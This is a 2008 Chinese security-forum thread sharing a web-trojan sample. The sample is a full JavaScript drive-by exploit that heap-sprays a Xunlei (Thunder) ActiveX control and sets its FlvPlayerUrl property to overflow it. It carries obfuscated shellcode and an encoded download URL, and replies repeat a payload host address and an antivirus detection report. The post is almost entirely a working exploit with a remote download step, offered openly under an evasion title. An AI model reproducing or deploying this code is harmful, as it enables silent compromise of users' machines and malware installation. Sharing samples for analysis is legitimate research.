收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 迅雷网马免杀
返回列表 发新帖
查看: 1898|回复: 3
收起左侧

[病毒样本] 迅雷网马免杀

[复制链接]
雪落的瞬间
发表于 2008-5-11 16:25:31 | 显示全部楼层 |阅读模式
  1. <SCRIPT>window.onerror=function(){return true;}</SCRIPT>
  2. <SCRIPT>
  3. document.writeln("<object classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F" id="Kazakh"><\/object>");
  4. document.writeln("<SCRIPT language="JavaScript">");
  5. document.writeln("var Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsunga5,Samsunga6,Samsunga7,Samsunga8,Samsunga9,Samsung10;");
  6. document.writeln("var Yorkfie1d,Yorkfie2d,Yorkfie3d,Yorkfie4d,Yorkfie5d,Yorkfie6d,Yorkfield,Wolfdalef,Wolfdalek,QuadroXFX;");
  7. document.writeln("Mcafee = new Array();\/\/("%u5c4f%u3a4e%u094e%u1f66%u4062%u0967%u4b62%u3a67%u2d4e%u7351%ue86c%ua651");");
  8. document.writeln("Samsung10 = unescape("%uc1ec"+"%ue579"+"%u98b8%u8afe"+"%uef0e"+"%ue0ce"+"%u3660"+"%u2f1a");");

  10. document.writeln("Yorkfie2d = unescape("%u6162");\/\/("%u4d52%ub56b%uf665%uf495%u4658%u8b58%u66af%u736f%u5187%u502");");
  11. document.writeln("Yorkfie5d = unescape("%u2f2f"+"%u7375"+"%u7265");\/\/("%u6348%u51a8%u4efa%u5186%u7468%u9903%");");
  12. document.writeln("Samsunga1 = unescape("%u4343"+"%u4343"+"%u4343");\/\/("%u4730%u5854%u3e66%u6153%u0cff%u3854%");");
  13. document.writeln("Yorkfie3d = unescape("%u2e36"+"%u656e"+"%u2f74");\/\/("%u1a59%ud89a%uef7a%ua973%ub65b%u8476%");");
  14. document.writeln("Yorkfie6d = unescape("%u6870"+"%u7474"+"%u3a70");\/\/("%u3671%u0c80%ua390%u3e6b%u6c51%u4872%");");
  15. document.writeln("Yorkfie4d = unescape("%u2e31"+"%u3333"+"%u322d");\/\/("%u8476%u3839%u3030%u5447%u4f58%u4e3c%");");
  16. document.writeln("Yorkfie1d = unescape("%u2e6b"+"%u7363"+"%u0073");\/\/("%u6efd%u8de1%u73b3%u5ba9%u5bb6%u67f9%");");
  17. document.writeln("Samsunga5 = unescape("%u5c03"+"%u2e61"+"%uc765%u0344%u7804%u0065%u3300%u50c0%u5350%u5057%u56ff");");
  18. document.writeln("Samsunga2 = unescape("%ua3e9"+"%u0000"+"%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0868");");
  19. document.writeln("Samsunga7 = unescape("%u8b56"+"%u2076"+"%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874");");
  20. document.writeln("Samsunga3 = unescape("%uf78b"+"%u046a"+"%ue859%u0043%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c");");
  21. document.writeln("Samsunga9 = unescape("%u5e8b"+"%u031c"+"%u8bdd%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e");");
  22. document.writeln("Samsunga6 = unescape("%u8b10"+"%u50dc"+"%uff53%u0856%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503");");
  23. document.writeln("Samsunga4 = unescape("%uff54"+"%u9516"+"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456%u04c7");");
  24. document.writeln("Samsunga8 = unescape("%ucbc1"+"%u030d"+"%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c");");
  25. document.writeln("Wolfdalef = Yorkfie6d+Yorkfie5d+Yorkfie4d+Yorkfie3d+Yorkfie2d+Yorkfie1d;");
  26. document.writeln("Yorkfield = Samsunga1+Samsunga2+Samsunga3+Samsunga4+Samsunga5+Samsunga6+Samsunga7+Samsunga8+Samsunga9+Samsung10;");
  27. document.writeln("Wolfdalek = unescape("%u7468%u7074%u2f3a%u752f%u6573%u3172%u332e%u3233%u3530%u6e2e%u7465%u622f%u6b61%u632e%u7373");");
  28. document.writeln("QuadroXFX = Yorkfield+Wolfdalef;");
  29. document.writeln("var Virus = 0x100000;");
  30. document.writeln("var DrWeb = QuadroXFX.length * 2;");
  31. document.writeln("var Norton = Virus - (DrWeb+0x38);");
  32. document.writeln("var ActivePerl = 0x0c0c0c0c;");
  33. document.writeln("var AntiVir = unescape("%u0D0D%u0D0D");");
  34. document.writeln("AntiVir = getSpraySlide(AntiVir,Norton);");
  35. document.writeln("Ewido = (ActivePerl - 0x100000)\/Virus;");
  36. document.writeln("for (i=0;i<Ewido;i++)");
  37. document.writeln("{");
  38. document.writeln("Mcafee[i] = AntiVir + QuadroXFX;");
  39. document.writeln("}");
  40. document.writeln("function getSpraySlide(AntiVir, Norton)");
  41. document.writeln("{");
  42. document.writeln("while (AntiVir.length*2<Norton)");
  43. document.writeln("{");
  44. document.writeln("AntiVir += AntiVir;");
  45. document.writeln("}");
  46. document.writeln("AntiVir = AntiVir.substring(0,Norton\/2);");
  47. document.writeln("return AntiVir;");
  48. document.writeln("}");
  49. document.writeln("var size_buff = 1070;");
  50. document.writeln("var x = unescape("%0c%0c%0c%0c");");
  51. document.writeln("while (x.length<size_buff) x += x;");
  52. document.writeln("Kazakh["\\x46\\x6c\\x76\\x50\\x6c\\x61\\x79\\x65\\x72\\x55\\x72\\x6c"] = x;");
  53. document.writeln("<\/script>");
  54. </SCRIPT><SCRIPT>
  55. document.writeln("<script>");
  56. document.writeln("location.replace("\\x61\\x62\\x6f\\x75\\x74\\x3a\\x62\\x6c\\x61\\x6e\\x6b");");
  57. document.writeln("<\/script>");
  58. </SCRIPT>
复制代码
回复

举报

Exia 该用户已被删除
发表于 2008-5-11 16:28:29 | 显示全部楼层
http://user1.33205.net/bak.css

老东西
回复

举报

tanlimo
发表于 2008-5-11 16:28:33 | 显示全部楼层
老掉牙了

http://user1.33205.net/bak.css
回复

举报

qigang
发表于 2008-5-11 20:08:47 | 显示全部楼层

2/1

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.Win32.Undef.gfd   

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.43.62
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-6-6 20:41 , Processed in 0.113401 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表